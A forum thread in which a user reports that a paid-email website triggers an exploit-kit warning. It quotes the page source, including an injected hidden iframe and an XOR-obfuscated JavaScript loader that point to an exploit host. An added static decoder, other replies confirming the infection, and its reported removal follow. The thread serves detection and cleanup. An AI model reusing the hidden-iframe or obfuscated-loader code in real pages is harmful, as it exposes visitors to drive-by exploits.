Full Version: [Resolved] Classical-Mail = Neosploit
longshanks1971
URL Source code: hxxp://classical-mail.cxm/pages/index.php?refid=

Triggers an Exploit Neosploit warning on my AV.


This extracted from the source code below loads MSN Homepage;

<iframe name="StatPage" src="hXXp://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>

This could be the source of the AV warning, again extracted from the code below;

<script language="JavaScript">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x77\x06\x21\x34\x21\x05\x34"; var2 = "\x32\x30\x77\x75\x26\x27\x36\x68\x77\x3d"; var3 = "\x21\x21\x25\x6f\x7a\x7a\x32\x3a\x39\x31"; var4 = "\x30\x3b\x78\x36\x3a\x27\x25\x26\x7b\x36"; var5 = "\x3a\x38\x7a\x37\x34\x3b\x3b\x30\x27\x67"; var6 = "\x7b\x25\x3d\x25\x77\x75\x22\x3c\x31\x21"; var7 = "\x3d\x68\x60\x75\x3d\x30\x3c\x32\x3d\x21"; var8 = "\x68\x60\x75\x26\x21\x2c\x39\x30\x68\x77"; var9 = "\x31\x3c\x26\x25\x39\x34\x2c\x6f\x3b\x3a"; var10 = "\x3b\x30\x77\x6b\x69\x7a\x3c\x33\x27\x34"; var11 = "\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("banner").innerHTML = dst;
</script>


The source code intact;


<html>
<head>
<title>Classical-Mail.com - Fastest Growing Rewarding Program</title>
<iframe name="StatPage" src="hxxp://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
<meta name="keywords" content="Advertising, Get Paid to Surf the Web, Get Paid to Surf, Earn Free Money, paid surfing, viewbars, mlm, make money with web site, cashbars, get paid to search the web, get paid to read emails, referrals, sponsors, affiliate programs, ads, sponsors, associate programs, partner programs, webmaster, revenue, commissions, affiliates, associates, surf for pay, surf for cash, surf to earn, directories, partners, referrals, program, sell, income, money making, business opportunities, get paid to surf the net, free, easy money, cash, money, extra income, online, earn money at home, freebies, Internet, money tree, make money, top, top sites, top money sites, mlm, easy, pay, paid, earn, cash, chat, affiliates, www, web, residual, email, xxxxxxx">
<meta name="Description" content="xxxxxxxxx - Get paid to read emails">
<meta name="ROBOTS" content="ALL">
<meta name="distribution" content="global">
<meta name="distribution" content="global">
<style TYPE="text/css">
<!--
.bullet {
font-family: Tahoma, Verdana, Arial, Helvetica;
font-size: 12px;
color: #DDDDDD
}
.menutext {
font-family: Tahoma, Verdana, Arial, Helvetica;
font-weight: bold;
color: #FFFFFF
}
a:link {
font-family: Tahoma, Verdana, Arial, Helvetica;;
font-size: 12px;
color: #DDDDDD;
text-decoration: none
}
a:hover {
font-family: Tahoma, Verdana, Arial, Helvetica;;
font-size: 12px;
color: #FFFFFF;
text-decoration: underline
}
a:visited {
font-family: Tahoma, Verdana, Arial, Helvetica;;
font-size: 12px;
color: #DDDDDD;
text-decoration: none
}
A.menu:link {
font-family: Tahoma, Verdana, Arial, Helvetica;;
font-size: 12px;
color: #DDDDDD;
text-decoration: none;
font-weight: bold
}
A.menu:visited {
font-family: Tahoma, Verdana, Arial, Helvetica;;
font-size: 12px;
color: #DDDDDD;
text-decoration: none;
font-weight: bold
}
A.menu:hover {
font-family: Tahoma, Verdana, Arial, Helvetica;;
font-size: 12px;
color: #FFFFFF;
text-decoration: underline;
font-weight: bold
}

body {
font-family: Tahoma, Verdana, Arial, Helvetica;;
font-size: 12px;
color: #DDDDDD;
background-color: #000000;
margin: 0px 0px
}
.p,td {
font-family: Tahoma, Verdana, Arial, Helvetica;;
font-size: 12px;
color: #DDDDDD
}
.style1 {color: #DDDDDD}
-->
</style>
</head>
<body>
<script language="JavaScript">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x77\x06\x21\x34\x21\x05\x34"; var2 = "\x32\x30\x77\x75\x26\x27\x36\x68\x77\x3d"; var3 = "\x21\x21\x25\x6f\x7a\x7a\x32\x3a\x39\x31"; var4 = "\x30\x3b\x78\x36\x3a\x27\x25\x26\x7b\x36"; var5 = "\x3a\x38\x7a\x37\x34\x3b\x3b\x30\x27\x67"; var6 = "\x7b\x25\x3d\x25\x77\x75\x22\x3c\x31\x21"; var7 = "\x3d\x68\x60\x75\x3d\x30\x3c\x32\x3d\x21"; var8 = "\x68\x60\x75\x26\x21\x2c\x39\x30\x68\x77"; var9 = "\x31\x3c\x26\x25\x39\x34\x2c\x6f\x3b\x3a"; var10 = "\x3b\x30\x77\x6b\x69\x7a\x3c\x33\x27\x34"; var11 = "\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("banner").innerHTML = dst;
</script>

<table border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#000000">
<tr>
<td align="center" class="menutext" colspan="2" bgcolor="#000066">
<table border="0" cellpadding="0" cellspacing="0" name="Logo_Banner" height="100">
<tr>
<td align="left" nowrap colspan="2"><img src="2.jpg" width="1002" height="49" usemap="#Map" border="0"><map name="Map"><area shape="rect" coords="357,16,400,33" href="/pages/index.php"><area shape="rect" coords="418,16,480,33" href="/pages/enter.php"><area shape="rect" coords="500,15,556,34" href="/pages/confirm.php"><area shape="rect" coords="577,16,641,33" href="/pages/advertise.php"><area shape="rect" coords="668,14,711,33" href="/pages/terms.php"><area shape="rect" coords="740,15,795,33" href="/pages/privacy.php"><area shape="rect" coords="829,15,866,34" href="/pages/help.php"><area shape="rect" coords="902,14,979,33" href="/pages/contact.php"></map></td>
</tr>
<tr>
<td background="3.jpg" align="left" nowrap colspan="2" height="182">
<div align="center"> <table border=0 cellpadding=0 cellspacing=0 bgcolor=ffffff><tr><td><a href=hxxp://www.classical-mail.com/scripts/runner.php?BA=89&hash=
e3cb8d02ebd5b95d172f163aaf92a455&url=
hxxp%3A%2F%2Floading-mails.com%2Fpages%2Findex.php%3Frefid%3D16888
target=_blank><img src=hxxp://www.classical-mail.com/scripts/runner.php?REDIRECT=hxxp%3A%2F%2F
www.loading-mails.com%2
Fimages%2Fbanner.gif&hash=587316aaa4a382ec3861b21814d65503 alt="" border=0></a></td></tr></table> </div>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td background="bg.jpg" align="center" valign="top" bgcolor="#23233B" class="menutext">
<table width="200" border="0" align="center" cellpadding="3" cellspacing="3" name="Menu">
<tr>
<td class="menutext" height="15" width="8%">&nbsp;</td>
<td class="menutext" height="15">&nbsp;</td>
</tr>
<tr>
<td class="menutext" height="15" width="8%">&nbsp;</td>
<td class="menutext" height="15">Total Members: 4,517</td>
</tr>
<tr>
<td class="menutext" height="15" width="8%">&nbsp;</td>
<td class="menutext" height="15">&nbsp;</td>
</tr>
<tr>
<td class="menutext" height="15" width="8%">&nbsp;</td>
<td class="menutext" height="15">Total Payouts: 49,526.64
</td>
</tr>
<tr>
<td class="menutext" height="15" width="8%">&nbsp;</td>
<td class="menutext" height="15"><b>Mails in queue</b>: <font face="Verdana, Arial, Helvetica, sans-serif" size="2">
881 </font></td>
</tr>
<tr>
<td class="menutext" height="15" width="8%">&nbsp;</td>
<td class="menutext" height="15"><b>Ads in rotation: <font face="Verdana, Arial, Helvetica, sans-serif" size="2">
6 </font></b></td>
</tr>
<tr>
<td class="menutext" height="15" width="8%">&nbsp;</td>
<td class="menutext" height="15">&nbsp;</td>
</tr>
<tr>
<td class="menutext" height="15" width="8%">&nbsp;</td>
<td class="menutext" height="15"><font size="4"><u>Partners
Sites</u></font></td>
</tr>
<tr>
<td class="menutext" height="15" width="8%">&nbsp;</td>
<td class="menutext" height="15"><a href="hxxp://www.avant-cash.com">Avant-Cash.com</a></td>
</tr>
<tr>
<td class="menutext" height="15" width="8%">&nbsp;</td>
<td class="menutext" height="15">&nbsp;</td>
</tr>
<tr>
<td class="menutext" height="15" width="8%">&nbsp;</td>
<td class="menutext" height="15"><u><font size="4"><b><font face="Tahoma">Featured
Sites</font></b></font></u></td>
</tr>
<tr>
<td class="menutext" height="15" width="8%">&nbsp;</td>
<td class="menutext" height="15">
<p><a href="hxxp://www.lotosus.com/">Affordable and Quality Web
Hosting for Sale</a></p>
</td>
</tr>
<tr>
<td class="menutext" height="15" width="8%">&nbsp;</td>
<td class="menutext" height="15">&nbsp;</td>
</tr>
<tr>
<td class="menutext" height="15" width="8%">&nbsp;</td>
<td class="menutext" height="15">&nbsp;</td>
</tr>
<tr>
<td class="menutext" height="15" width="8%">&nbsp;</td>
<td class="menutext" height="15"><u><font size="4"><b><font face="Tahoma">Sponsors
Links</font></b></font></u><br>
</td>
</tr>
<tr>
<td height="15" class="menu" width="8%">&nbsp;</td>
<td height="15" class="menu">
<p><b><a href="hxxp://www.getpaidforum.net/" target="_blank">Get Paid
to Post & Reffer</a></b></p>
</td>
</tr>
<tr>
<td height="15" class="menu" width="8%"></td>
<td height="15" class="menu"> </td>
</tr>
<tr>
<td height="15" width="8%">&nbsp;</td>
<td height="15">&nbsp;</td>
</tr>
</table>
</td>
<td valign="top" bgcolor="#23233B" align="center">
<table border="0" cellpadding="0" cellspacing="0" height="400" name="Body">
<tr>
<td valign="top">
<!--Begin Body -->
<br> <body bgcolor="#23233B">
<table width="598" border="0" cellspacing="3" cellpadding="3" align="center">
<tr>
<td align="left" valign="top"> <!-- Begin BidVertiser code -->
<script LANGUAGE="JavaScript1.1" SRC="hxxp://bdv.bidvertiser.com/BidVertiser.dbm?pid=4910&bid=9941"></SCRIPT>
<noscript><a href="hxxp://www.bidvertiser.com">pay per click advertising</a></noscript>
<!-- End BidVertiser code --> </td>
</tr>
<tr>
<td align="left" valign="top" height="10">&nbsp;</td>
</tr>
<tr>
<td align="left" valign="top"><font face="Verdana">
<font size="4"><b>We are 3 Years old now</b></font><b><font size="4">! -
Classical-Mail.com</font></b></font><p>
<b><a target="_blank" href="../note.htm">
<font color="#FF0000" face="Verdana">You wanna
learn more about the truth of boycott on this great site?</font></a></b></td>
</tr>
<tr>
<td align="left" valign="top">
กก</td>
</tr>
<tr>
<td align="left" valign="top">
<font face="Verdana" size="4">We just performed a database cleanup job on 3rd April
2008, click
<a target="_blank" href="hxxp://www.classical-mail.com/pages/20080402.txt">
<b><U>here</U></b></a> to see accounts that have been purged from database, and
<a target="_blank" href="hxxp://www.classical-mail.com/pages/20080402.gif">
<b><U>here</U></b></a> for the latest statistic before database cleanup.</font></td>
</tr>
<tr>
<td align="left" valign="top">
กก</td>
</tr>
<tr>
<td align="left" valign="top">
<p>
<h2><font face="Tahoma">Members</font></h2>
<font size="2" face="Tahoma"><font size="1"><b>•</b></font><b> Backup
done Daily<font size="1">.<br>
•</font> FREE Membership, </font>(<a href="gold.php"><font face="Tahoma">Upgraded Membership also
Available here</font></a><font size="2" face="Tahoma">)<br>
<font size="1">•</font> 0-2.5% Fees Payouts, Ads Processed On Weekly Basis.<br>
<font size="1">•</font> Upto 1c Per Link, Search links From 0.5c.<br>
<font size="1">•</font> Cash for Paid Mails only, Points for PTP Banner
Advertisement.<br>
<font size="1">•</font> Low $0.5 Min Payout which can be reached within
a few days.<br>
<font size="1">•</font> <u>We do not accept Proxy users anymore!</u><br>
<font size="1">•</font> No Turning Numbers but we don't tolerate Blind
Clickers.<br>
<font size="1">•</font> No Sponsor Ads Within Paid Mails.<br>
<font size="1">•</font> No Shared Email Only Solo Email.<br>
<font size="1">•</font> We Only Accept Members From:</font></b><p>
<font size="2" face="Tahoma">Australia, Austria, Belgium, Canada,
Denmark, Finland, France, Germany, Greece, Iceland, Netherlands,
New Zealand, Norway, Spain, Sweden, Switzerland, United Kingdom and
United States. </font>
</td>
</tr>
<tr>
<td align="left" valign="top" height="30">กก</td>
</tr>
<tr>
<td align="left" valign="top" width="100%">
<h2><font face="Tahoma">Advertisers</font></h2>
<p><font size="2" face="Tahoma"> <font size="1"><b>•</b></font> The
most cost effective advertising.<br>
<font size="1"><b>•</b></font></font><b><font face="Tahoma"><font size="2">
Guaranteed Clickthru Ad Options.</font></font></b><font face="Tahoma"><font size="2"><br>
<font size="1"><b>•</b></font> eMail Advertising or Banner Advertising.<br>
<font size="1"><b>•</b></font><b> Advertise to 100% opt in membership.</b><br>
<font size="1"><b>•</b></font> Members are&nbsp;eager to receive
your ads.<br>
<font size="1"><b>•</b></font> Absolutely no Spam!<br>
</font><font face="Tahoma"><font size="2"><a href="hxxp://www.classical-mail.com/pages/note.htm"><font size="1"><b>•</b></font><b>
No Incentive/Begging adwords For Search Ads!</b></a></font></font><font size="2"></font><font size="2"><br>
<font size="1"><b>•</b></font><b> Inactive members are deleted every
15 days.</b><br>
<font size="1"><b>•</b></font> <b>Cheaters are deleted on daily basis.</b><br>
<font size="1"><b>•</b></font> We will customize your Ad Campaign.<br>
<font size="1"><b>•</b></font> Reliable, Friendly Service.</font></font></p>
</td>
</tr>
</table>
<br>
<!--End Body -->
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td background="4.jpg" colspan="2" align="center" height="55"><font font="font" color="#FFFFFF" size="2"><b><font face="Tahoma" color="#DDDDDD">&copy;
All Rights Reserved 2004-2008 Classical-Mail.com</font></b></font></td>
</tr>
</table>
<center>
</center>
</body>
</html>
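Added example, not part of the original thread: a static decoder for the XOR-obfuscated script quoted in the post above. It treats the script purely as text (nothing is eval'd or written into a page), recovers the key from the `^ 85` expression and reports the decoded iframe target in the thread's defanged `hxxp` form. The names `SAMPLE` and `decodeLoader` are chosen here; the sample is the post's script, reflowed onto shorter lines.

```javascript
// Added example: decode the page's XOR-obfuscated loader as text only.
// Nothing is eval'd or written into a DOM. SAMPLE is the script from the post, reflowed.
const SAMPLE = String.raw`
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x77\x06\x21\x34\x21\x05\x34";
var2 = "\x32\x30\x77\x75\x26\x27\x36\x68\x77\x3d"; var3 = "\x21\x21\x25\x6f\x7a\x7a\x32\x3a\x39\x31";
var4 = "\x30\x3b\x78\x36\x3a\x27\x25\x26\x7b\x36"; var5 = "\x3a\x38\x7a\x37\x34\x3b\x3b\x30\x27\x67";
var6 = "\x7b\x25\x3d\x25\x77\x75\x22\x3c\x31\x21"; var7 = "\x3d\x68\x60\x75\x3d\x30\x3c\x32\x3d\x21";
var8 = "\x68\x60\x75\x26\x21\x2c\x39\x30\x68\x77"; var9 = "\x31\x3c\x26\x25\x39\x34\x2c\x6f\x3b\x3a";
var10 = "\x3b\x30\x77\x6b\x69\x7a\x3c\x33\x27\x34"; var11 = "\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11;
for(i = 0; i < sr.length; i++) { var d = parseInt(sr.charCodeAt(i) ^ 85); dst = dst + String.fromCharCode(d); }
`;

function decodeLoader(src) {
  // 1. Collect each varN = "\x.." literal as raw bytes.
  const vars = {};
  for (const m of src.matchAll(/\b(var\d+)\s*=\s*"((?:\\x[0-9a-fA-F]{2})+)"/g)) {
    vars[m[1]] = [...m[2].matchAll(/\\x([0-9a-fA-F]{2})/g)].map(h => parseInt(h[1], 16));
  }
  // 2. Follow the concatenation order from the "x = var0+var1+..." line.
  const cat = src.match(/=\s*(var\d+(?:\s*\+\s*var\d+)+)\s*;/);
  // 3. Read the single-byte XOR key from the charCodeAt(...) ^ N expression.
  const keyMatch = src.match(/charCodeAt\(\s*\w+\s*\)\s*\^\s*(\d+)/);
  if (!cat || !keyMatch) throw new Error("not the XOR-loader pattern");
  const key = Number(keyMatch[1]);
  const bytes = cat[1].split("+").flatMap(name => {
    const v = vars[name.trim()];
    if (!v) throw new Error("undefined fragment " + name.trim());
    return v;
  });
  const html = String.fromCharCode(...bytes.map(b => b ^ key));
  // 4. Triage the decoded markup: iframe target and whether it is hidden.
  const iframeSrc = (html.match(/<iframe[^>]*\ssrc="([^"]+)"/i) || [])[1] || null;
  const hidden = /display\s*:\s*none/i.test(html);
  // Report the target defanged, in the same hxxp form the thread uses.
  return { key, html, hidden, src: iframeSrc && iframeSrc.replace(/^http/i, "hxxp") };
}

const result = decodeLoader(SAMPLE);
console.log(result.key, result.hidden, result.src);
```

The decoded string is a second `display:none` iframe named `StatPage`, pointing at `banner2.php` on the same golden-corps.com host as the plain iframe in the page head.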
wagdoll
Yes, you're right, it is the golden-corps with the exploit/trojan. It's hacker code that's appeared on a few sites lately
longshanks1971
Thank you for confirming wagdoll, I wasn't 100% sure. I have also received a reply from the PO saying thank you for the notification and it's been removed

Take care,

Craig